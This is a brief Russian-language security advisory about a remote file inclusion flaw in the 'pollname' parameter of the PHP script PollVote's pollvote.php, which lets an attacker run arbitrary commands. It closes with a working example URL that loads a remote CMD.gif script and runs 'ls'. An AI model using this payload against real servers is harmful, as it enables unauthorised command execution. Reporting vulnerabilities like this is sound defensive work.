Программа: PollVote
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной фильтрации входных данных в параметре "pollname" сценария "pollvote.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера.
Пример:
http://www.[host].com/[path]/pollvote.php? pollname=http://www.[host].com/CMD.gif?&cmd=ls